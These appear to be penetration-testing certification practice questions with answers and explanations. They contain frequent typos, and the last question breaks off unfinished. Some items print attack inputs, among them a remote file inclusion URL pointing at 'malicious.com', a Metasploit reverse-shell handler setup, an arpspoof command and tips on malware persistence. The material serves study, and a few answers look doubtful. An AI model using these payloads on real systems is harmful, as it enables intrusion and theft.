To successfully achieve sandbox escapre from a VM and compromise the Host OS, which condition needs to be met?
A.Hypervisor needs to be running on Windows
B.A working exploit, and the hypervisor should not be patched
C.Linux must be the underlying OS
D.Root privileges on the VM machine
B.A working exploit, and the hypervisor should not be patched
Explanation:
Exploit tools that allows attacker to escape a virtual machine to directly attack the hypervisor have been sought for years, with high prices paid for working exploits on the open market.
Exploits have been found for VMware, Xen Project, Hyper-V and VirtualBox, but each has been patched shortly after it was found.
In most virtualization environments, VM escape isnt likely to work unless a new exploit is introduced and you are able to use it to exploit a compromised host before it is patched by your target organization
138
With the following HTTp request, George is able to execute a file on the target host.
'http://target.com/page.php?article=C:\\www\\temp\\test.exe'
```
What type of attack technique is he using?
A. Directory traversal
B.SQL Injection
C.Remote File Inclusion
D.Local File Inclusion
```
D.Local File Inclusion
Explanation:
There are two kinds of file inclusion: Local (LFI) and Remote (RFI)
Local File Inclusion includes files outside of the web root and renders the contents of local operating system files, such as the password file, to the browser window
139
What information will the following command provide?
'wmic service get name,displayname,pathname'
A.It will list all scheduled tasks
B.It will start WMIC service with a specific name and path
C.It will run a service named displayname in a specific path
D.It will list all services with their name, display name and executable location
D.It will list all services with their name, display name and executable location
Explanation:
Lower-privilege users will not be able to modify the service; however, they can still search services.
The WMIC command can be used to look for services with unquoted executable paths
140
What type of attack is James attempting with the following request?
'http://target.com/page.php?access=http://malicious.com/malicious.php'
A.Fuzzing
B.SQL Injection
C.Remote File Inclusion
D.Local File Inclusion
C.Remote File Inclusion
Explanation:
Remote file inclusions allow files or even whole pages to be displayed inside a vulnerable web page.
If the parameters of the HTTP request can be altered to point to a malicious location, its possible the web application is susceptible to remote file inclusion, which in turn could allow for malicious code to be run on the server or on the client
141
```
Which of the following are OllyDbg, WinDbg, and IDA?
A.Malwares
B.Debuggers
C.DoS tools
D.Windows exploitation tools
```
B.Debuggers
Explanation:
OllyDbg is an x86 debugger that emphasizes binary code analysis, which is useful when source code is not available. It traces registers, recognizes procedures, API calls, switches, tables, constants and strings, as well as locates routines from object files and libraries.
WinDbg is a multipurpose debugger for the Microsoft Windows computer operating system, distributed by Microsoft. Debugging is the process of finding and resolving errors in a system; in computing it also includes exploring the internal operation of software as a help to development.
The Interactive Disassembler (IDA) is a disassembler for computer software which generates assembly language source code from machine-executable code. It supports a variety of executable formats for different processors and operating systems.
142
James would like to get remote access to a Linux machine.
```
What tool could he use that is similar to Remote Desktop in Windows?
A.VNC
B.SMB
C.SSH
D.Telnet
```
A.VNC
Explanation:
Virtual Networking Computing (VNC) is a common remote control tool.
Much like Remote Desktop Protocol (RDP), VNC can be used to remotely control a host through the graphical user interface.
There are several VNC solutions and each has its pros and cons.
VNC solutions and each has its pros and cons.
VNC, in most cases, is cross-platform software, meaning it can be used on Windows, Linux and MAC
143
```
802.11, 802.11a, 802.11b, 201.11g, 802.11n, and 802.11ac are all standards for what type of devices?
A.Ethernet
B.Wi-Fi
C.BLuetooth
D.Opticss
```
B.Wi-Fi
Explanation:
The 802.11 (routers and access points) is a family of Wi-Fi devices.
Wireless networks that use IEEE 802.11 standards rely on RF for transmitting and receiving data
144
```
What cannot be found by using theHarvester?
A.Vulnerabilities
B.Email accounts
C.Domain names
D.Open ports
```
A.Vulnerabilities
Explanation:
While theHarvester does collect a wide variety of data, such as emails, domain, subdomains, virtual hosts, open ports, and service banners, theHarvester is not a vulnerability scanner and does not provide vulnerability information
145
What is sudo?
A.Sudo is a vulnerability scanning tool for Linux
B.Sudo is the default admin user on Linux machines
C.Sudo is a vulnerable Linux distro
D.Sudo stands for super user do and is used for elevating privileges
D.Sudo stands for super user do and is used for elevating privileges
Explanation:
Sudo is a program for Unix-like operating systems that allows administrators to delegate authority within the operating system to low privileged user accounts
146
Mechanisms like whitelisting and blacklisting can be used on which of the following?
A.Firewall, IPS and IDS
B.Man-in-the-middle tools and sniffing tools
C.Malware and Trojan horses
D.Vulnerability scanners and host discovery services
A.Firewall, IPS and IDS
Explanation:
In computer security, whitelisting and blacklisting are basic access control mechanisms that can be implemented in network firewalls, spam filters, web application firewalls (WAFs) etc.
A blacklist is the opposite - it allows all but denies members of the blacklist
147
Alex is conducting a network scan, but he is only able to find half the hosts in the network using a regular Nmap command.
When he adds "-Pn" to the command line all hosts appear in the results.
How is the -Pn affecting the results?
A.-Pn configures the scanner to find offline hosts
B.-Pn disables ICMP requests
C.-Pn is a UDP scan, and hosts respond to UDP traffic
D.-Pn enables Nmap to use DNS queries
B.-Pn disables ICMP requests
Explanation:
-Pn means "disable ping" or "do not use ICMP echo requests" to determine if a host is online or not.
Many operating systems are configured not to respond to ICMP echo requests (or ping),
With a default configuration, Nmap would assume hosts and not responding to ping were offline hosts and would skip them
148
George has successfully logged in on a compromised Linux machine.
He is greeted with a restricted shell.
What could he try in order to upgrade to full shell access?
A.Try to elevate his privileges by using local file inclusion
B.Brute-force admin credentials
C.Check what commands he can run and focus on SUID commands
D.Log in to the server on a different port
C.Check what commands he can run and focus on SUID commands
Explanation:
When greeted with a restricted shell, a pentester can try the following techniques:
- Check the commands you can run, particularly looking for SUID commands
- Check to see if you can use sudo and what sudo commands you can execute
- Check for languages like Perl, Python or Ruby that you can run
- Check to see if you can use redirect operators like | or > and escape characters like single quotes, double quotes or other execution tags
149
In a cold boot attack, the attacker is attempting to:
A.Recover encryption keys from the memory of a powered-off device
B.Boot from a malicious USB device
C.Force the Windows server to boot into safe mode
D.Force the Wi-Fi access point to reboot
A.Recover encryption keys from the memory of a powered-off device
Explanation:
The cold boot attack is an attack method discovered by Princeton University researches (roughly a decade ago) who were able to demonstrate the ability to recover disk encryption keys from random access memory (RAM) when the power is cycled on the device
150
Tim has asked Peter if he can scan his website for vulnerabilities and old versions.
```
Which tool is most suitable for getting this information in a passive way?
A.Burp Suite
B.DirButser
C.Nikto
D.Wfuzz
```
A.Burp Suite
Explanation:
Burp Suite would be the most suitable tool because it uses a proxy to intercept the HTTP requests going to and from a website in an easily readable way
Nikto is an open-source web application scanning tool that uses a command-line interface that does not have a proxy and cannot intercept HJTTP requests
Wfuzz is a web application fuzzer that uses payloads of data to sniff out directories, files or headers.
It cannot intercept HTTP requests
DirBuster is a tool used for finding directories in a web application, not to intercept HTTP requests
151
When defining scope, you need to consider the difference between "third-party assests" and "third party hosted assets"
Whats the difference?
A.Third-party assets are located on a third-party resource, and third-party hosted assets are owned by a third party company
B.Both third-party assets and third-party hosted assets belong to a third-party company
C.Third-party assets belong to another company, and third-party hosted assets belong to the client company but are hosted on another resources
D.They are essentially the same thing, but the third-party hosted assets are simple hosted online
C.Third-party assets belong to another company, and third-party hosted assets belong to the client company but are hosted on another resources
Explanation:
When defining the scope of a pentest, it is very important to be able to distinguish assets owned by the client and those owned by a third party
152
In the following situation, what should the pentester do:
A SQL injection has been found on a publicly available server.
A.Note the finding and add it to the top of the pentest report
B.Mitigate the issue and then notify the client
C.Proceed with testing as this is not a critical vulnerability
D.Notify the client immediately
D.Notify the client immediately
Explanation:
When a pentester finds a critical finding on the network such as a publicly exploitable vulnerability from outside the firewall that anyone on the Internet could exploit, it should be brought to the clients attention so the proper mitigation can be applied to prevent the potential risk of compromise
153
In Kerberos ticketing attack, ticket-granting tickets (TGTs) are incredibly valuable and can be created with extended life spans.
```
What do attackers usually call successfully acquired TGTs?
A.Golden Tickets
B.Default credentials
C.Session tickets
D.Admin Hashes
```
A.Golden Tickets
Explanation:
When attackers succeed in acquiring TGTs, they often call them golden tickets because they allow complete access to Kerberos-connected systems, including creation of new tickets, account changes and even creation of accounts or services
154
Given the Metasploit excerpt below, what type of attack is being attempted?
$ ./msfconsole -q
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.123
lhost => 192.168.1.123
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > run
A.Binding shell
B.Pass the hash
C.Reverse shell
D.user enumeration
C.Reverse shell
Explanation:
The Metasploit Meterpreter shell and reverse shell are effective ways of interacting with a target environment, as they run entirely in memory and leave little or no trace after disconnecting
155
What would be the result of the following command?
'airmon-ng start wlan0 9'
A.Attempt to connect to wlan0 9 times
B.Start of 9 monitoring interfaces for wlan0
C.Use 9 as a password for wlan0 network
D.Start of a Wi-Fi monitoring interface on channel 9
D.Start of a Wi-Fi monitoring interface on channel 9
Explanation:
The "airmon-ng" command is included in the Aircrack-ng suite of tools, in order to configure an adapter in monitor mode.
156
```
Which tool can be used to enumerate the applications on local and remote Windows hosts?
A.WMI
B.Remote Desktop
C.SSH
D.Telnet
```
A.WMI
Explanation:
Windows management instrumentation (WMI) is a powerful tool that allows local and remote data-gathering and is installed on all Windows machines
157
James is looking for a tool for offline password cracking.
He would like to take advantage of the GPU cores on his machine.
```
Which tool would you suggest to James?
A.Hashcat
B.John the Ripper
C.Mimikatz
D.Hydra
```
A.Hashcat
Explanation:
Hashcat is a password cracking utility that uses graphics processing unites (GPUs) to crack passwords at a very high rate of speed.
Hashcat is much faster than the traditional tools (like John the Ripper, which is CPU-bound), making it a tool of choice if you have access to appropriate hardware
158
SInce detection is not a concern, which method of persistence would you choose when exploiting a Linux machine?
A.Create a daemon with malware
B.USe code injection and inject it into a service
C.Edit the boot loaded to load the malware
D.USe DLL injection
A.Create a daemon with malware
Explanation:
Daemons are programs that run in the bacvkground and not under the control of the user. Think of daemons like services in WIndows
Code Injection would require much more effort and would only benefit if the goal was to hide the attack
DLLs are used in WIndows OS only
Editing the boot loader would require much higher privileges and much more effort in comparison to creating a daemon
159
When sending a business card over Bluetooth, James uses the connection to sneak a message into the transfer.
What type of attack is this?
A.Bluesmacking
B.Bluejacking
C.Session hijacking
D.Bluetooth man-in-the-middle
B.Bluejacking
Explanation:
This method transmits data to the device without the users knowledge
A typical way to carry out this type of attack is by sending an electronic business card via Bluetooth to an unsuspecting victim
160
James client uses a techonology that associates servers with their public keys.
```
What type of technique is this?
A.TLS over TCP
B.Certificate pinning
C.Pass the hash
D.Two-factor authentication
```
B.Certificate pinning
Explanation:
Certificate pinning is the technique of associating one host with its public key and using it to make a trust decision.
Once the public key changes, the host is no longer trusted.
SSH is an example of a service that uses this technology
161
Amy is preparing a pentest report.
Should she include information about testing methods and objectives that did not provide any significant result?
A.No, such results are never included
B.Yes, all information should be included in the report
C.No, she should only include results with high success rates
D.It is the report writers decision if those should be included
B.Yes, all information should be included in the report
Explanation:
In the pentest report, all methods and objectives previously discussed in the statement of work (SOW) should be addressed. Any information, even insignificant, could be useful for the client. Sometimes, a given method does not produce successful results, but could still provide good insight to the client environment and help find room for improvement.
162
```
Which attack technique could be applicable in a web application pentest?
A.ARP Spoofing
B.Kernel exploit
C.Bluejacking
D.Reflected HTML injection
```
D.Reflected HTML injection
Explanation:
A reflected HTML injection vulnerability is a non-persistent browser execution attack, meaning that the injection would be lost once the current browser session was closed
163
WHich of the following could be considered a proper multifactor authentication solution?
A.HTTP password and htaccess password
B.Password authentication and SMS-received PIN
C.HTTP login and HTTPS Login pages
D.Two different password authentication mechanisms
B.Password authentication and SMS-received PIN
Explanation:
Multifactor authentication would suggest more than one authentication method.
Passwords, even if used several times, are a single method of authentication.
Multifactor authentication implementations combine two or more authentication mechanisms coming from different authentication categories (or factors)
164
```
When attempting to test the security of an IOS application, which tool would James most likely choose?
A.APKX
B.Drozer
C.iGoat
D.APK Studio
```
C.iGoat
Explanation:
iGoat and DVIA (Damn Vulnerable iOS App) was developed to assist pentesters and security researches with testing against common weakness in a safe and legal environment
165
Testing multiple password variations to obtain the admin username on a website is essentially:
A.Credential harvesting
B.Brute-forcing
C.Pass the hash
D.Dictionary attack
B.Brute-forcing
Explanation:
Brute-force apssword attacks are very inefficient and are typically a last resort.
However, tools like John the Ripper, Cain and Abel, and Hashcat help increase the chances of successful password exploitation.
JTR can conduct both dictionary and brute-force password attacks against common hashing algorithms
166
In website enumeration, what would spidering a website usually do?
A.Spidering is a vulnerability scanning method for testing mutiple exploits
B.Spidering is also called web crawling and it indexes pages on the website
C.SPidering a website is related to testing the certificates associated with the site
D,SPidering is form of DOS attack against a website
B.Spidering is also called web crawling and it indexes pages on the website
Explanation:
Crawling a website usually involves bots and scripts that automatically browse the website and index all pages.
167
Rob has compromised a Linux machine and gained shell access.
He noticed that there is an OpenSSH X11 session on the machine.
What technique could Robtry agaisnt the open session?
A.Hijacking the session
B.Attempting a man-in-the-middle attack
C.Sniffing the connection
D.There is nothing to be done against an OpenSSH X 11 session
A.Hijacking the session
Explanation:
Rob could try hijacking the OpenSSH X11 session.
OpenSSH 4.3p2, and probably other versions, allows local users to hijack forwarded X connections by causing SSH ti set DISPLAY to :10, even when another process is listening on the associated port
168
What would the following command produce?
'net view /AMS'
A.A list of groups in the AMS domain
B.A list of networks in the AMS domain
C.A list of hosts in the AMS domain
D.A list of users in the AMS domain
C.A list of hosts in the AMS domain
Explanation:
You can also use /domain:[domain name] to search a domain that the system has access to other than the current domain.
In thise case the domain name is "AMS", which usually stands for "Americas"
169
Consider the following output:
Share name Resource Remark
-------------------------------------------------------------------------------
ADMIN$ C:\Windows Remote Admin
C$ C:\ Default share
D$ D:\ Default share
E$ E:\ Default share
F$ F:\ Default share
G$ G:\ Default share
K$ K:\ Default share
IPC$ Remote IPC
N$ N:\ Default share
The command completed successfully.
What command was used to produce this output and what does it show us?
A.The command is "net session" and the output shows current SMB shares on remote hosts
B.The command is "net share" and the output shows current SMB shares on a local host
C.The command is "smb list" and the output shows all SMB shares on a local host
D.The command is 'rpcclient --list" and the output shows all SMB shares on a remote host
B.The command is "net share" and the output shows current SMB shares on a local host
Explanation:
The "net: command in Windows is very powerful.
You can use net view \\ to discover available Windows shared drives or showmount -e for NFS shares
170
```
Data isolation is usually important in what sort of engagement?
A.Goal Based
B.Compliance Based
C.Red Team
D.Black Box
```
B.Compliance Based
Explanation:
Data isolation usually is related to systems covered by a compliance requirement.
Such systems fall under specific conditions directly related to the purpose they are built for.
171
Which of the following technique could be used for lateral movement between WIndows host?
A.Man-in-the-middle
B.RCE
C.RPC (Remote Proecure Call)/ Distributed Component Object Model (DCOM)
D.LFI
C.RPC (Remote Proecure Call)/ Distributed Component Object Model (DCOM)
Explanation:
The MITRE ATT&CK matrix identifies the Microsoft Windows distributed component object model (DCOM) as a valid lateral movement technique that can be used to extend the functionality of the component object model (COM) from the local computer to other computers, using remote procedure call (RPC) technology
RCE stands Remote Code Execution
LFI stands for local file inclusion
Man in the middle is a traffic capture and sniffing technique
172
An attack is able to input malicious JavaScript into a comment entry under a post on a web page.
This script is executed upon loading the page with the post.
What type of vulnrability does this describe?
A.Reverse shell
B.Reflected cross-site scripting (reflected XSS)
C.Stored Cross-site scripting (Stored XSS)
D.SQL Injection
C.Stored Cross-site scripting (Stored XSS)
Explanation:
Stored or persistent XSS is a vulnerability much like reflected XSS: however, it does not disappear upon reloading of the page
173
What are password filters used for?
A.To correlate usernames with passwords
B.To search a packet capture for passwords
C.TO remove any passwords from the network traffic
D.TO ensure minimal password requirements are met
D.TO ensure minimal password requirements are met
Explanation:
Weak passwords may be remediated through the use of minimum passwords requirements and password filters.
Password filters are used to enforce specific password restrictions for the system in question.
They filter out passwords that, for example, are missing a symbol or are shorter than a specific number of letters
174
Alex managed to position her machine the client internal network.
```
What tool could she use to capture NTLMv2 hashes?
A.Nmap
B.Ettercap
C.Aircrack-ng
D.Nessus
```
B.Ettercap
Explanation:
Ettercap is a free open source network security tool for man-in the middle attacks on LAN
It can be used for computer network protocol analysis and security auditing.
It runs on various Unix like OS including Linux, Mac OS X, BSD and Solaris and on Microsoft Windows
175
James would like to review the SOAP project file to help him with pentest he is conducting.
What is the SOAP project file?
A.PArt of the application documentation
B.A database file produced by the vulnerability scanner
C.A list of vulnerabilities for a specific application
D.A configuration file
A.PArt of the application documentation
Explanation:
Simple Object Access Protocol (SOAP) project file describes the format for sending and receiving messages in a web applications.
THis file could be used by an attacker to learn the recommended methods of sending messages and potentially suggest ways to force it into error condition
176
While using open-source intelligence, John finds financial files about the targeted company.
What can they be used for?
A.To reveal available exploits
B.To discover vulnerabilities about the target
C.To obtain the corporate address and other internal information
D.TO obtain users credentials
C.To obtain the corporate address and other internal information
Explanation:
Financial files almost always contain information that can be used by hackers to better understand the target.
No vulnerabilities can be displayed from such files, since vulnerability information usually comes with running a service
No exploit information can be extracted from these types of files
User credentials are not stored in financial files where multiple people can see them
177
In most penetration black box tests, what is the first thing you should do upon engagement?
A.Exploit the vulnerabilities
B.Gather information about the organization via passive intelligence-gathering methods
C.Develop exploits for the engagement
D.Actively scan the target scope
B.Gather information about the organization via passive intelligence-gathering methods
Explanation:
Passive information gathering is a process of collecting information about the target (company, person, organization etc.) without interacting with it
You cannot exploit something you haven't already found. To find a vulnerability you need to perform active scans
Active Scanning is based on the information gathered from the passive process
You cannot develop an exploit for engagement without first knowing the vulnerability
178
George is analyzing the randomness and complexity of the session ID generated on a targeted website.
He notices a pattern in which each new session ID is generated following a simple algorithm.
```
What attack technique is George most likely to use against the site?
A.Credential harvesting
B.Pass the hash
C.Kerberos golden ticket
D.Cookie manipulation
```
D.COokie manipulation
Explanation:
In cases where developers use their own sessions IDs, if randomness and complexity are not adequately applied to the equation, the cookie value can be manipulated to identify a valid session, which means the application could be susceptible to brute-force attacks
179
What information could be obtained using the bluesnarfing technique?
A.Wi-Fi passwords from Bluetooth-enabled devices
B.PIN codes from Bluetooth-enabled devices
C.Phone book contacts from Blue-enabled devices
D.SMS information from Bluetooth-enabled devices
C.Phone book contacts from Blue-enabled devices
Explanation:
Bluesnarfing is a technique that can potentially provide access to the phone book of a targeted device
180
```
Which command is used to search for exploits in Metasploit?
A.Exploits command
B.Searchsploit command
C.Search command
D.Show exploits command
```
C.Search command
Explanation:
The search command can be used inside Metasploit and will search for the next argument passed to it
The easiest way of using the search function is by issuing the command search followed by a search term, for example, flash to search for exploits related to Flash player.
By using the search command, Metasploit will search for the given search term in the module names and description.
You can also use the search command with a keyword to search for a specific author, an OSVDB ID, or a platform.
The 'help search' command displays the available keywords in the msfconsole
181
During a penetration test, James is discovering host using Nmap.
He would like to have the host OS identified and the list of results outputted into an XML file.
```
WHich Nmap command would cover both conditions?
A.nmap -sS -O 10.15.0.0/24 -oS results
B.nmap -O 10.15.0.0/24 -oX results
C.nmap -oP -sS 10.15.0.0/24 -x results
D.nmap -P0 -O 10.15.0.0/24 -oS results
```
B.nmap -O 10.15.0.0/24 -oX results
Explanation:
The -O option stands for OS detection
10. 15.0.0/24 is the IP range for scanning
- oX stands for output to XML file
182
James is looking to establish persistence on a Linux host that would survive restart.
What is the first thing he should try?
A. Set it as a cron job
B.Put a link to the file in the /etc/folder
C.Use the registry files to set up persistence
D.Add the file to system files
A. Set it as a cron job
Explanation:
Much like scheduled tasks in Windows, Linux uses cron jobs.
Cron jobs can be set to run on a specific time frame, such as hourly, daily, monthly or yearly.
They can also be ran on boot!!!
183
```
You managed to infiltrate an organization and were able to exfiltrate the SAM database from the server. What tool would you use against the SAM database in an attempt to crack the passwords from it?
A.ExifTool
B.grep
C.John the Ripper
D.Nessus
```
C.John the Ripper
Explanation:
John the Ripper is a free, powerful cracking software tool.
Originally developed for the Unix OS, it can now run on fifteen different platforms
184
```
Which of the following technologies is used for deception?
A.WAF
B.Worms
C.Honeypots
D.Proxy
```
C.Honeypots
Explanation:
Honeypots are a deception technology used to entice attackers to follow false trails that increase visibility into the attack. An example of a honeypot is a system on the network that would appear vulnerable to many exploits and could even be named in a way that would suggest that high-value information is stored on it.
185
```
George has gained access to a Windows server and is attempting lateral movement. He would like to keep the machine clean from malware and at the same time remain unnoticed. Ideally, he should not have to deploy anything on the machine. Which tool could he use?
A.PowerShell Empire
B.PsExec
C.Remote Desktop Protocol
D.Meterpreter
```
B.PsExec
Explanation:
PsExec is a legitimate tool created by Sysinternals and is widely used by many Windows admins.
It is likely that the tool will already be deployed on the server and George will not have to download anything else.
Additionally PsExec is fairly covert tool and, unless one is going through the Windows logs, it would likely be unnoticed
Remote Desktop protocol is likely to make some noise and be noticed.
PowerShell Empire would require additional files to be deployed.
Meterpreter would also require a download
186
```
From which services can John enumerate user information if he does not have access to any system?
A.RDP service
B.HTTP service
C.SSH service
D.SMB and SNMP services
```
D.SMB and SNMP services
Explanation:
These services contain a lot of user information that can be really handy for the pentester
SSH is a service for remote terminal access
RDP is a service for remote desktop access
HTTP is a web service
187
What would the following piece of python code do?
#!/usr/bin/env python2
from socket import *
target = raw_input('Enter host: ')
targetIP = gethostbyname(target)
print 'Starting scan on host ', targetIP
#scan reserved ports
for i in range(20, 1025):
s = socket(AF_INET, SOCK_STREAM)
result = s.connect_ex((targetIP, i))
if(result == 0) :
print 'Port %d: OPEN' % (i,)
s.close()
A.The code will do host discovery for hosts between 20 and 1025 on the network
B.The code will search for hosts with open ports 20 and 1025
C.The code will take a host as an input and scan only ports 20 and 1025 on it
D.The code will take a host as an input and scan ports between 20 and 1025 on it
D.The code will take a host as an input and scan ports between 20 and 1025 on it
Explanation:
The script will take user input from the terminal. It will attempt to get the IP address in case of hostname being provided. There are few print lines, which will produce status updates. For example 'Starting scan on host', targetIP This line will print out something like "Starting scan on host 127.0.0.1".
The for loop will go through all ports between 20 and 1025 and attempt to open a socket (connection) to these ports on the targeted host.
188
What is the difference between whitelisting and blacklisting?
A.Whitelisting means only allowing a specific list of accepted items and blocking everything else; blacklisting is only blocking a specific item and allow everything else
B.Whitelisting is used in firewalls and blacklisting is used in IDS
C.From an IT security perspective they are the same
D.Whitelisting means only blocking a specific list of accepted items and allowing everything else; blacklisting is only allowing a specific item and blocking everything else
A.Whitelisting means only allowing a specific list of accepted items and blocking everything else; blacklisting is only blocking a specific item and allow everything else
Explanation:
For example, in relation to firewalls, when you whitelist a short list of ports it means that all ports are closed and only those in the whitelist are open. In blacklisting, a specific list of "known bad" characters is created, and the web application firewall will block all requests containing the characters in the blacklist and allow everything else.
189
Nathan is leading a pentest and has used a wide variety of tools, one of which was Nikto.
```
What did he most likely use it for?
A.Decryption
B.Brute-forcing his way in
C.Scanning
D.Denial of service attack
```
C.Scanning
Explanation:
Nikto is a n open-source web application scanning tool that uses a command line interface and displays the results in text form
Brute-force is a type of attack where the attacker tries lots of combinations of credentials to compromise a victim machine
Decryption is the process of taking encoded or encrypted text or other data and converting it back into text that you or the computer can read and understand
A DoS attack is a cyberattack which the attacker sends lots and lots of network packets to the victim in order to disrupt his web services for a certain amount of time
190
James is running Nmap against a network subnet, but he is scanning only the "well known ports".
```
What port range is he scanning?
A.0-1023
B.0-1024
C.0-49151
D.0-65535
```
A.0-1023
Explanation:
An important part of port scanning is having an understanding of common ports and services.
While ports 0-1023 are known as "well known ports" or "system ports" there are a quite a few higher ports that are commonly of interest when conducting port scanning
191
```
Rebecca has successfully gained unprivileged access to a Linux machine as a part of a pentest. She would like to perform privilege escalation by using an exploit. She has the exploit on a remote web server. What command should Rebecca use on the Linux terminal in order to download the exploit locally?
A.yum install
B.mv
C.apt-get
D.wget
```
D.wget
```
Explanation:
GNU Wget (written as wget) is a computer program that retrieves content from web servers.
```
It supports downloading via HTTP, HTTPS, and FTP
Its features include recursive download, conversion of links for offline viewing of local HTML, and support for proxies.
Wget is almost always preinstalled on the Linux host
Apt-get for installing, upgrading and cleaning packages
Yum is an open source package management utility and yum install is the command to install a package
mv is an integrated Linux command used to move files and directories from one directory to another or to rename a file or directory
192
```
What would be the purpose of searching through a client's network for previously known and unknown hosts?
A.Building an asset inventory
B.Identifying vulnerable hosts
C.Building a vulnerability database
D.Finding hidden hosts
```
A.Building an asset inventory
Explanation:
Pentesters use scanning tools that provide host discovery services in order to build an inventory database.
The results can help to determine the scope of the engagement
193
George has found a service running on port 445.
How could he take advantage of the SMB service he has found?
A.George could use it for a remote code execution exploit
B.George could upload malware through SMB service
C.SMB is a secure Windows service and could not be exploited
D.George could try a user enumeration exploit
D.George could try a user enumeration exploit
Explanation:
Running Server Message Block (SMB) services could potentially be exploited in a user enumeration attack.
THere are Metasploit plugins that can be used in such an attack
194
```
How can Nathan send SYN packets to a remote host?
A.hping -S -V targetsite.com -p 8080
B.ping -S -V targetsite.com
C.ping -S -V targetsite.com -p 8080
D.dirb targetsite.com -r -s SYN
```
A.hping -S -V targetsite.com -p 8080
Explanation:
hping supports sending different types of packets.
ping -S -V targetsite.com -p 8080 is incorrect because ping only sends ICMP.
ping -S -V targetsite.com is an invalid command.
dirb targetsite.com -r -s SYN is incorrect because dirb is a directory brute-forcer.
195
James has prepared detailed statistical data about the threats and vulnerabilities in his client's industry sector. His goal is to provide his client with a clearer understanding of their security posture in comparison with similar companies. In which section of the report would James put this information so that it would be noted by everyone who reads it?
In which section of the report would James put this information so that it would be noted by everyone who reads it?
A.Conclusion
B.FIndings and Remediation
C.Methodology
D.Summary
A.Conclusion
Explanation:
The conclusion is where James would provide a summary and make recommendations for future work. He might also include metrics and measures that help put the information presented in the report in the context of the organization or a peer group of similar organizations, or in a global context.
196
```
What can you use to remotely execute commands on a Windows host once you have valid credentials?
A.PsExec
B.SSH
C.Net command
D.Telnet
```
A.PsExec
Explanation:
The PsExec SysInternals command can help facilitate this type of connection when using privileged user accounts.
All the same theories and restrictions apply with PsExec, except you would be using a hash value instead of a password
197
Client-side injection and copy/paste buffer caching are both methods of:
A.Reverse Shell Binding
B.Network Vulnerability Scanning
C.Dynamic Application Analysis
D.Persistence
C.Dynamic Application Analysis
Explanation:
Dynamic and runtime analysis is the process of executing and testing a program in real time, also known as dynamic application security testing (DAST).
This type of analysis includes the following:
* Brute-force of the PIN or pattern lock on the device
* Binary attacks against the mobile app to escalate privileges
* Client-side injection attacks (e.g., SQL injection)
* Access to application functions when the PIN or pattern lock on the device is not enabled
* Copy/paste buffer caching
* Obtaining sensitive information stored in memory
* Evaluating shared application data storage
198
Alex has a list of hosts, provided by the client.
```
What tool could he use to idetnfiy running services on these hosts?
A.Ping
B.dnnssniff
C.Burp
D.Nessus
```
D.Nessus
Explanation:
Nessus is a vulnerability scanning tool that also scans for open ports and running services. If a tester is provided with a list of hosts, Nessus can be configured to scan a range of ports and identify the services running on them. Listing known vulnerabilities for each of these services is where Nessus really shines, thanks to its wide range of plugins.
Nmap is another tool that could be used to similar effect.
199
You are devising a penetration test plan. The client has informed you that their mission-critical VLAN is only running on a 10 Mbit network and is usually using 90% of the bandwidth just for normal working operations between 9 a.m. and 5 p.m. Taking this into account, what would you suggest to the client?
A.Perform network testing outside of working hours and use less aggressive scanning techniques
B.Scan the VLAN as planned and notify the client in case of congestion
C.DO not scan this VLAN, as it might interfere with normal business operations
D.Postpone the test until they upgrade the network to 1Gbps
A.Perform network testing outside of working hours and use less aggressive scanning techniques
Explanation:
Obviously there are some client considerations to take into account. Many tools like Nessus, OpenVAS and others do have options for scheduling tasks. You could configure less aggressive scans and schedule them to be run outside the client's working hours.
200
What will the following command do?
'cewl -v -d 3 -m 3 -w list.txt https://example.com/app'
A.The command will generate and save a list of characters with a minimum length while spidering the site to depth 3
B.The command will scan the website for vulnerabilities with high criticality and write a report in "list.txt"
C.The command will print the version of the server hosting https://example.com and write it into a faile called "list.txt"
D.The command will attempt to authenticate to the website using passwords from "list.txt" and will perform three attempts per minute
A.The command will generate and save a list of characters with a minimum length while spidering the site to depth 3
Explanation:
The Cewl tool will create a word list by using words and phrases from the targeted site. While gathering info, the tool will spider the site to depth 3. Because of "-m 3" the minimum length of words in the word list will be 3 characters. The results will be saved in a file named "list.txt".
Cewl is useful for generating word lists related to specific targets.
201
```
A useful tool maintained by MITRE is the ATT&CK database which consists of several categories. Which of the following is not part of ATT&CK the categories?
A.Exfiltration
B.Exploitation
C.Credential Access
D.Privilege Escalation
```
B.Exploitation
Explanation:
Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral movement, Collection, Command and Control, Exfiltration and Impact
202
What sort of a pentest is John conducting that includes the following specific requires?
- Password compexity policy
- Encryption algorithm complexity
- Data encyrption in transit and at rest
A.An insider threat
B. An APT
C.A red team engagement
D.A compliance-based pentest
D.A compliance-based pentest
Explanation:
COmpliance-based assessments audit an organizations ability to implement and follow a given set of security standards within an environment
203
```
Which of the following could not be tested off-site?
A.Internal web applications
B.Social Engineering
C.Domain Controllers
D.Wi-Fi AP
```
D.Wi-Fi AP
Explanations;
In order to test wireless access points (APs), the pentester needs to be on-site and in proximity to the AP.
Domain controllers and social engineering are usually tested through the internet. Internal web applications are usually tested once an internal account is being compromised.
204
George has gained access to the client's network. He is setting up a machine and preparing the following command:
arpspoof -i eth0 -t 192.168.11.33 -r 192.168.11.1
What is George attempting to do?
A.An arpspoofing attack where 192.168.11.1 is the target and 192.168.11.33 is the gateway
B.A DNS zone transfer from DNS server 192.168.11.1 to hist host 192.168.11.33
C.An arpspoofing attack where 192.168.11.33 is the target and 192.168.11.1 is the gateway
D.A credential-harvesting attack between two hosts
C.An arpspoofing attack where 192.168.11.33 is the target and 192.168.11.1 is the gateway
Explanation:
The command is part of the arpspoof tool and is used in man-in-the-middle attacks. The -i eth0 is used to select the network interfaces for the attack, -t is used to specify the target, and -r is showing the route, or in this case the gateway, of the network.
205
How would the following observation best be described in a pentest report?
James noticed that the client tends to keep obsolete services and ports running on critical servers. For example, an FTP service was found running, but the client says they have not used FTP for at least a couple of years.
A.Configuration error
B.Outdated software
C.Vulnerability with a CVSS v3 score above 8
D.Lack of best practices
D.Lack of best practices
Explanation:
The Center for Internet Security (CIS) provides best-practice solutions. Those best practices describe how similar situations should be handled. For example, services that are no longer used should be disabled. Accounts that are no longer used should also be disabled and in some cases deleted.
206
WHat sort of assessment would you recommend to a company that would like to have the following criteria met?
- Detailed code review of the application
- External test of the application
- Internal test of the application in a testing environment
A.Red team
